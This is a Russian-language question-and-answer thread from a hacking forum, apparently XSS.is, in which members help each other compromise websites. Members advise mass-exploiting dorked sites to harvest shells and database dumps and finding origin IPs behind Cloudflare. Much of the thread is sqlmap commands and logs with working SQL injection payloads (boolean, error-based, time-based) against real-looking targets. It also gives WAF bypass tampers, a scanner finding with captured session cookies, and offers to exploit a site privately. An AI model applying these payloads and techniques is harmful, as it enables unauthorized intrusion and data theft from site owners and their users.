Для начала почитать о том, зачем нужен тот или иной инструмент и разобраться, в чем разница между ними. Еще лучше, понять как они работают и от этого плясать.
Взлом сайта с какой стороны? Админка/Дамп?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Взлом сайта с какой стороны? Админка/Дамп?
Взлом сайта понятие абстрактное.
Ты хочешь взломать конкретно сайт конкретной школы? Или тебе просто нужно набрать шеллов, дампов, etc для чего-то еще?
Если второе, то сначала выбери уязвимость одну (или какая-нибудь RCE в движке-модулях, или sqli), потом парси сайты из выдачи по доркам или просто списком по доменной зоне чекай, а потом ломай, можно хоть руками.
Вопрос возможно глупый, но для чего определять айпи сервера за клаудом, что можно интересного найти?
Уязвимых соседей по серверу или уязвимые сервисы (cpanel, phpmyadmin, ftp и т.д.).
Правильно я понимаю для того, чтобы поискать уязвимые сервисы на открытых портах на самом айпи,и выше вреоятность там найти что-то интересное (они менее защещены)?
Подскажите трабла такая sqlmap перед началом работы пингует сайт если ответа на пинг нету он выдает ошибку error connection и на этом работа завершается , так вот в чем суть вопроса подскажите есть ли команда которая принудительно заставит его продолжить работу ? В jsql есть а тут я не нашел .
Обход WAF CloudFlare, гео фильтров, Bot Fight mode и JS Challenge, обход уведомлений (функция платных тарифов, при которой тебе на почту приходят уведомления если WAF фиксирует попытки эксплуатации уязвимостей на твоем сайте, или если тебя дудосят), для успешной эксплуатации каких либо уязвимостей или дудоса.
В каком смысле пингует? ICMP? Такого в нем нет, первый запрос всегда на резолв домена, второй запрос - http get на твой указанный url. Есть ключ --offline, но это работает только когда есть валидная сессия с сохраненными данными (имена бд, таблиц, колонок). Если же сайт у тебя в браузере работает, а через мап таймауты летят, то дело либо в хидерах и куках, либо в waf. Ну и еще ключ --ignore-timeouts
Последнее редактирование:
Кто сможет подсказть пихаю скулю в sqlmap выбивает что параметр injectable но в конце пишет что уязвимости нет, ниже оставил выдачу мапы, кто поможет буду благодарен
Код:
[18:30:52] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[18:30:54] [INFO] testing for SQL injection on URI parameter '#1*'
[18:30:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:31:04] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:31:04] [INFO] testing 'Generic inline queries'
[18:31:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:31:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:31:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:31:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:31:23] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:31:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:31:25] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:31:26] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:31:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:31:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:31:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:31:32] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:31:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[18:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:31:36] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:31:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:31:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:31:38] [INFO] testing 'MySQL inline queries'
[18:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:31:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[18:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:31:46] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:31:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:31:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:31:51] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:31:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:31:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:31:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:32:00] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:32:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:32:06] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:32:07] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:32:08] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:32:09] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:32:10] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:32:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:32:13] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:32:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:32:16] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:32:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:32:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:32:19] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:32:20] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:32:20] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:32:22] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:32:23] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:32:24] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:32:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:32:26] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:32:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:32:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:32:28] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:32:28] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:32:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:32:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:32:55] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[18:33:34] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[18:33:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[18:34:31] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[18:34:50] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[18:35:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[18:35:37] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[18:36:20] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[18:37:04] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[18:37:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:37:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[18:38:24] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[18:38:47] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[18:39:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[18:39:32] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[18:39:51] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[18:40:17] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[18:40:45] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[18:41:07] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[18:41:29] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[18:41:31] [WARNING] false positive or unexploitable injection point detected
[18:41:31] [WARNING] URI parameter '#1*' does not seem to be injectable
[18:41:31] [CRITICAL] all tested parameters do not appear to be injectable. As heuristic test turned out positive you are strongly advised to continue on with the testsТут что угодно может быть. Надо смотреть конкретный таргет и данные софта которым ты нашел ее вообще (предполагаю окунем).
Код:
HTTP Request
GET /search?text=1'" HTTP/1.1
Referer: https://test.com/
Cookie: PHPSESSID=ucjccfngpjjak7vkc6np6lqvp2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: test.com
Connection: Keep-alive
HTTP Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Apr 2022 15:03:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Original-Content-Encoding: gzip
Content-Length: 2522
<!--SELECT SQL_CALC_FOUND_ROWS a.article_id, a.user_id, a.header, ab.brief, a.search_header, a.published_at, CONCAT('/e/', a.search_header) as `href`, as.comments, as.views, as.likes, am.title, MATCH(asr.title, asr.header, asr.keywords, asr.description) AGAINST ('1\'\"') as `sort1`, MATCH(asr.`text`) AGAINST ('1\'\"') as `sort2`, u.page_name, IF(u.screen_name = '', u.page_name, u.screen_name) as `screen_name`
FROM `article` AS `a`
INNER JOIN `article_stat` AS `as` ON `as`.`article_id` = `a`.`article_id`
LEFT JOIN `article_meta` AS `am` ON `am`.`article_id` = `a`.`article_id`
LEFT JOIN `article_brief` AS `ab` ON `ab`.`article_id` = `a`.`article_id`
INNER JOIN `article_search` AS `asr` ON `asr`.`article_id` = `a`.`article_id` AND (MATCH(asr.title, asr.header, asr.keywords, asr.description) AGAINST ('1\\'\\"' IN BOOLEAN MODE) OR MATCH(asr.`text`) AGAINST ('1\\'\\"' IN BOOLEAN MODE))
INNER JOIN `user` AS `u` ON `u`.`user_id` = `a`.`user_id`
WHERE (`a`.`status_id` = '3')
ORDER BY sort1 DESC, sort2 DESC, a.published_at DESC, a.article_id DESC
LIMIT 10 OFFSET 0-->
<pre style="margin: 20px; padding: 20px; border: #CCC 1px dashed; line-height: 1.3;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\"' IN BOOLEAN MODE) OR MATCH(asr.`text`) AGAINST ('1\\'\\"' IN BOOLEAN MODE))
' at line 6</pre><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on boolean in /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Db/Mysqli.php:184
Stack trace:
#0 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Taquro/AbstractTable.php(177): Exp\Db\Mysqli->fetchAssoc(false)
#1 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Page/search.php(41): Exp\Taquro\AbstractTable->next()
#2 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Render/HtmlRender.php(189): Site\Page\search->execute()
#3 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Render/HtmlRender.php(72): Exp\Render\HtmlRender->tryOutput(Object(Site\Page\search))
#4 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Front.php(197): Exp\Render\HtmlRender->output(Object(Site\Page\search))
#5 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Front.php(108): Site\Front->render(Object(Site\Page\search))
#6 /pub/home/grenouer/novi_expange/htdocs/index.php(31): Site\Front->run()
#7 {main}
thrown in <b>/pub/home/grenouer/novi_expange/htdocs/__private/Exp/Db/Mysqli.php</b> on line <b>184</b><br />
Код:
sqlmap.py -u "https://test.net/statistics/geographical/map/accidentmap.php?type=1*" --level=5 --risk=3 --random-agent --batch --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.6.4.2#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:09:44 /2022-04-19/
[14:09:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3' from file 'C:\Users\Downloads\sqlmapproject-sqlmap-1.6.4-2-gd5fb92e\sqlmapproject-sqlmap-d5fb92e\data\txt\user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[14:09:44] [INFO] resuming back-end DBMS 'mysql'
[14:09:44] [INFO] testing connection to the target URL
[14:09:47] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - comment)
Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' OR NOT 6598=6598-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' AND (SELECT 4362 FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(4362=4362,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NmOx
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' OR SLEEP(5)#
---
[14:09:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[14:09:47] [INFO] fetching database names
[14:10:08] [WARNING] the SQL query provided does not return any output
[14:10:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:10:08] [INFO] fetching number of databases
[14:10:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:10:08] [INFO] retrieved:
[14:10:09] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[14:10:15] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
[14:10:57] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[14:10:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:11:04] [ERROR] unable to retrieve the number of databases
[14:11:04] [INFO] falling back to current database
[14:11:04] [INFO] fetching current database
[14:11:04] [INFO] resumed: ''
[14:11:04] [CRITICAL] unable to retrieve the database names
[14:11:04] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 34 timesПо-моему все очевидно. Похоже на WAF, опять же надо руками чекать и пробовать его обходить.
Как вариант, если это не WAF то может быть rate-limiting, тоже надо проверять вручную.
waf там нет, не силен в раскрутке руками Может посоветуешь годных статей?
или могу скинуть скулю если не сложно поможешь раскрутить ?
Кидай под хайд или в личку.
В итоге там оказался WAF который триггерится на слова CONCAT, UNION, ALL, SELECT, NULL и пр. Отдает ошибку 406. Обходится тамперами randomcase и modsecurityversioned. Отправил в личку подробную инфу.
Последнее редактирование:
Доброго времени суток!
Подскажите пожалуйста как составлять команду в мапу для подобной уязвимости
Подскажите пожалуйста как составлять команду в мапу для подобной уязвимости
Код:
URL:https://test.com/Parameter:/<n>/<n>/<n>/[*]-<n>-<n>/
[HEADING=3]Attack Details[/HEADING]
arrow_drop_up
Path Fragment input /<n>/<n>/<n>/[*]-<n>-<n>/ was set to f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in
Tests performed:
[LIST]
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||' => TRUE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'|||' => FALSE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||''||' => TRUE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||'000190'||' => FALSE
[*]'||''||'f1-williams-interested-in-signing-oscar-piastri-from-alpine-in => TRUE
[*]zzz'||'000190'||'f1-williams-interested-in-signing-oscar-piastri-from-alpine-in => FALSE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in000190 => FALSE
[*]f'||'1-williams-interested-in-signing-oscar-piastri-from-alpine-in => TRUE
[*]f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in => FALSE
[/LIST]
Original value: f1-williams-interested-in-signing-oscar-piastri-from-alpine-in
[HEADING=3]Vulnerability Description[/HEADING]
arrow_drop_up
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Discovered by SQL Injection
[HEADING=3]HTTP Request[/HEADING]
arrow_drop_up
content_copy
GET /2022/04/26/f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in-2023-16538494/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://test.com/
Cookie: ak_bmsc=C359387D91892F25E6840C68FA6900B2~000000000000000000000000000000~YAAQfBjdWAXli1qAAQAAzsb2Zg9YkyD7EHj1I9HKT37S4rSETSLci6vNzKe7yNzOLFlskvxft3Wh14TW3qGBV5GBYBIIafMPE6+twZCEwM2FqW/5egQPCRuQre1JBWO0Dt4xlDxtAFpihUbekGMCdZGMFBPxKz9iA59VhzdrxZFtvOQTJZh8qP/FLlUBy640eGryQLEfk0czr1nVUIL+NL+na1N80mlmHJWExE2BFyQ+0H/P2/BHLJhtPrp2ma5ksdFn/9nz9JJIxW7+nH3MoLuitY86EJIDgxoCblAat080WADV6dwIuhOdyBrQt9egp38tMbEB+GfQDnBifm60aUR/+9cyI67xu1mVhgW7+fIEIEbogIqlAt4A3Q==; ruid=%7B%22rta2.metro.co.uk%22%3A%7B%22chid%22%3A%22l2gfq8er-qzq09pyzgow-l2i7fnomvds%22%2C%22l%22%3A%222h4%3A1650931200000%3A6356564149%22%2C%22__mou%22%3A%223630377665%3Adirect%3A1650994890439%3Agdrxh%3A1%22%2C%22__mov%22%3A%226356564149.direct%5Earticle%5Esport%5Ef1.1.1650994890439.1650994890439%22%2C%22v%22%3A0.48%2C%22phid%22%3A%22view-l2gfq8er-qzq09pyzgow-l2i7fnomvds%22%7D%2C%22v%22%3A0.48%2C%22%2F%22%3A%7B%22dd%22%3A26948%7D%7D; _fbp=fb.2.1650989698214.1181658483; bm_sv=832E1BFCA008091ED44B4B76135DDD1E~5JhdHmKCn18XyovTzIc8X91AUJjcxXpGvjcv8JQbc0sYQTeGuQE8sUk5Rvaw7SZx6SiWpI9YBGThUPF3TZHzKsr179pbnlGAfsnWx1wX1vzIRGT7sTFefJmT80C9cIG+gROs91mIVGDLepKIi4C3SocrUsWcfJ8zDtAOyZssqLo=; DM_SitId915=true; DM_SitId915SecId5143=true; DM_SitIdT915=true; DM_SitId915SecIdT5143=true
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: test.com
Connection: Keep-aliveКак обычно, только инжектить сюда попробуй:
Код:
https://site.com/2022/04/26/f*1-williams-interested-in-signing-oscar-piastri-from-alpine-in-2023-16538494/Существует ли способ, как находить старые и/или непопулярные сайты, т.к они более уязвимые (гугл дорки не в счет). Хочется немного практики. Для новых и поплуярных, что выдает гугл, не хватает знаний.